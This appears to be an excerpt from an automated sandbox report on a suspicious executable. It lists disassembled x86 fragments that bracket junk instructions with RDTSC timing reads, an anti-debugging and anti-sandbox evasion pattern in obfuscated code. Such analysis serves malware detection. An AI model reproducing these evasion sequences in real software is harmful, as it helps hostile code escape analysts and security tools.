Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF58E4 second address: FF5912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 je 00007F4B9132D696h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F4B9132D696h 0x00000019 jc 00007F4B9132D696h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5D7B second address: FF5D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5D81 second address: FF5DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F4B9132D69Eh 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F4B9132D6A1h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b pop eax 0x0000001c jmp 00007F4B9132D6A2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFC749 second address: FFC74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFC74D second address: FFC751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFC751 second address: FFC765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4B90BE622Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFC765 second address: FFC76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EC40 second address: F7EC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000B69 second address: 1000B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000B70 second address: 1000B85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6230h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100114E second address: 1001152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001586 second address: 100158E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100158E second address: 10015AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007F4B9132D69Ah 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001728 second address: 100172D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100172D second address: 1001733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001733 second address: 1001737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001737 second address: 100177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4B9132D6BCh 0x0000000c jmp 00007F4B9132D6A3h 0x00000011 jmp 00007F4B9132D6A3h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b jmp 00007F4B9132D69Bh 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001BE4 second address: 1001BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001BEA second address: 1001BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001BEE second address: 1001C0E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jo 00007F4B90BE6226h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 jg 00007F4B90BE623Dh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10034A5 second address: 10034AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8717C second address: F871A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F4B90BE6226h 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F4B90BE6239h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10068F0 second address: 1006906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b js 00007F4B9132D698h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC24D6 second address: FC2508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jl 00007F4B90BE6232h 0x0000000c jne 00007F4B90BE622Ch 0x00000012 nop 0x00000013 mov ecx, dword ptr [ebp+122D2C44h] 0x00000019 lea eax, dword ptr [ebp+1248727Ah] 0x0000001f mov ecx, dword ptr [ebp+122D2BC8h] 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2508 second address: FC250C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC250C second address: FC2512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2512 second address: FAB3B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F4B9132D698h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+122D2A7Ch] 0x0000002c mov edx, dword ptr [ebp+122D33B5h] 0x00000032 call dword ptr [ebp+122D334Eh] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2CCA second address: FC2CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6230h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6239h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2D3E second address: FC2D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], esi 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4B9132D698h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov edx, dword ptr [ebp+122D2D5Ch] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d jl 00007F4B9132D696h 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2D7D second address: FC2D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4B90BE6226h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2D87 second address: FC2D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2F57 second address: FC2F5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3788 second address: FC378D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC385D second address: FC3867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4B90BE6226h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3867 second address: FC387A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F4B9132D698h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC387A second address: FC38CA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4B90BE6228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D2E77h], ecx 0x00000011 mov dh, E1h 0x00000013 lea eax, dword ptr [ebp+124872BEh] 0x00000019 jmp 00007F4B90BE622Ch 0x0000001e nop 0x0000001f jng 00007F4B90BE623Dh 0x00000025 jmp 00007F4B90BE6237h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e jl 00007F4B90BE6226h 0x00000034 pop ecx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC38CA second address: FC393F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F4B9132D698h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 cld 0x00000025 lea eax, dword ptr [ebp+1248727Ah] 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F4B9132D698h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov di, bx 0x00000048 jo 00007F4B9132D69Ch 0x0000004e mov ecx, dword ptr [ebp+122D2C1Ch] 0x00000054 or edi, dword ptr [ebp+122D2BFCh] 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC393F second address: FC3946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006F91 second address: 1006FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D6A5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006FAA second address: 1006FB6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B90BE6226h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006FB6 second address: 1006FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4B9132D696h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006FC2 second address: 1006FE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1007165 second address: 1007179 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B9132D69Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1007179 second address: 10071A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6235h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE622Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10072D1 second address: 10072EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4B9132D6A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1007496 second address: 100749E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100749E second address: 10074A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D34C second address: 100D359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 ja 00007F4B90BE6226h 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D359 second address: 100D372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D6A3h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D372 second address: 100D37F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80659 second address: F8067A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F4B9132D6ACh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F4B9132D6A4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BE95 second address: 100BE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BE9B second address: 100BEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BEA0 second address: 100BEBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BEBE second address: 100BEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100BFE3 second address: 100BFEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C3E7 second address: 100C3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C3F4 second address: 100C407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C407 second address: 100C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F4B9132D6A0h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jbe 00007F4B9132D6AFh 0x0000001a jmp 00007F4B9132D6A7h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C445 second address: 100C44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C44B second address: 100C466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D6A7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA02 second address: 100CA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA06 second address: 100CA1D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F4B9132D696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F4B9132D6B4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA1D second address: 100CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6238h 0x00000009 pushad 0x0000000a jmp 00007F4B90BE622Fh 0x0000000f jno 00007F4B90BE6226h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA50 second address: 100CA58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA58 second address: 100CA6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6232h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CA6E second address: 100CA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F4B9132D696h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100CBB9 second address: 100CBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4B90BE6226h 0x0000000a push ebx 0x0000000b jmp 00007F4B90BE622Bh 0x00000010 jmp 00007F4B90BE622Fh 0x00000015 pop ebx 0x00000016 pop edx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4B90BE6235h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101062E second address: 1010639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4B9132D696h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1010639 second address: 101063F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101346E second address: 1013496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4B9132D69Ah 0x0000000e jmp 00007F4B9132D6A5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1013496 second address: 101349C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101349C second address: 10134A6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4B9132D69Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1012D8B second address: 1012D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4B90BE6226h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1013045 second address: 101304F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101304F second address: 1013055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1013055 second address: 1013059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101319A second address: 10131AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE622Dh 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10131AF second address: 10131B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10131B4 second address: 10131BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10159A3 second address: 10159A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10170B3 second address: 10170D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10170D2 second address: 10170D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A212 second address: 101A21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4B90BE622Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019BA3 second address: 1019BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F4B9132D6A9h 0x0000000b pushad 0x0000000c jne 00007F4B9132D696h 0x00000012 jmp 00007F4B9132D6A7h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019EB4 second address: 1019EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 jbe 00007F4B90BE623Bh 0x0000000d jmp 00007F4B90BE622Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019EE6 second address: 1019EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019EF1 second address: 1019EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019EF7 second address: 1019F01 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B9132D696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
